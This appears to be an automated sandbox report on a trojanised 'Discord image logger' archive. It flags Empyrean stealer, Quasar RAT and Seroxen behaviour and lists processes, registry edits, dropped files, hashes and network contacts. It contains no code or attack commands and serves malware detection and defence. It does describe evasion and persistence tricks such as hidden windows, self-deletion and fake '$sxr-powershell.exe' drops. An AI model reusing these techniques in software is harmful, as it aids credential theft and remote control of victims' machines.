Malware Analysis Report

2025-03-15 03:36

Sample ID 250224-es4n3azjew
Target discord-image-logger-release.zip
SHA256 498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059
Tags
discovery quasar seroxen defense_evasion spyware trojan empyrean
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059

Threat Level: Known bad

The file discord-image-logger-release.zip was found to be: Known bad.

Malicious Activity Summary

discovery quasar seroxen defense_evasion spyware trojan empyrean

Detects Empyrean stealer

Quasar RAT

Quasar family

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar payload

Empyrean family

Seroxen, Ser0xen

Seroxen family

Loads dropped DLL

Executes dropped EXE

Deletes itself

Checks computer location settings

Hide Artifacts: Hidden Window

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Runs ping.exe

Uses Task Scheduler COM API

Suspicious use of UnmapMainImage

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies registry class

Kills process with taskkill

Views/modifies file attributes

Suspicious use of AdjustPrivilegeToken

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-24 04:13

Signatures

Detects Empyrean stealer

Description Indicator Process Target
N/A N/A N/A N/A

Empyrean family

empyrean

Analysis: behavioral6

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

93s

Max time network

141s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20241010-en

Max time kernel

103s

Max time network

19s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 3b8a103a8bf8810e346989e96537142a
SHA1 f15ac8d08fa08e5596962bab287f9ada3dbfdb0d
SHA256 d1ef060e5f85038ec3bf233b808d4f19bbd7b89004fbfe8a64e1793e6bd1c548
SHA512 d77980ef603e8818e2e81da90848f4187e9933931cb37859f1645f6c15c521e2460b5156d200ee7a098e1b454cd174918d873f2a1190f67ef8001537408d703c

Analysis: behavioral13

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20241010-en

Max time kernel

118s

Max time network

119s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 7e4934fe584f8af05769ea82f26c2c8d
SHA1 b6c8ce236ebacbb2201f95422baefe8da7da621d
SHA256 b0f39c04a8a3beadadd9b1aeb763bde1a90516196bfe0d596e9b6bda48e6d7a7
SHA512 238883eccd6ce5ba67f0f5ad7229ec615f5d7ca8fd65f9b7c8f9cc33401fda72c4327d009f6a613f5bd1b093ba32105a9a3a79b40b25c662768db72828ade200

Analysis: behavioral11

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20250207-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 5655cfbf488c9ed93c1c92c6887cad13
SHA1 c58ece13cee5553e55327b933b6b9cd1724309ad
SHA256 53b27f2aac3577c72b1cedec39c609d10f8d986d4504a29bfa93a8c4ae2cf1f5
SHA512 20c91d105131e254e1b4719c2bcadd1cc4b224aebe3327fb11d70b0323d126ec0f95633bb3bba36886f23b3fe11b6d943b30304f0de403e9a36205b139d6ba1b

Analysis: behavioral15

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 58dd7604b30aa1e947b8793b401ed49e
SHA1 7fde10807d7ded3107c2f356bbcc28b796637d5e
SHA256 ba14d03360c1cd20d2fdfb82a7f1474ad293dbbd0b96f6887d9f231dc0fef1a9
SHA512 bd1833245f787985bfc9adf3b66c15f8a4752dc5409852a12e93e21a5b7b9fb29da8ccfda3b9827d6229c9f4fd10cc5f37f63e26cea0165cfa1598c9cc7db566

Analysis: behavioral18

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 udp
GB 104.78.173.167:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-24 04:13

Reported

2025-02-24 04:15

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

150s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Seroxen family

seroxen

Seroxen, Ser0xen

trojan seroxen

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\System32\vcruntime140_1d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File created C:\Windows\System32\vcruntime140d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\ucrtbased.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\vcruntime140d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\ucrtbased.dll C:\Windows\$sxr-powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\ucrtbased.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\vcruntime140_1d.dll C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\System32\vcruntime140_1d.dll C:\Windows\$sxr-powershell.exe N/A
File opened for modification C:\Windows\System32\vcruntime140d.dll C:\Windows\$sxr-powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1740370487" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 24 Feb 2025 04:14:48 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={6E75927A-EA84-4F8F-95FC-2A90EA306FF6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
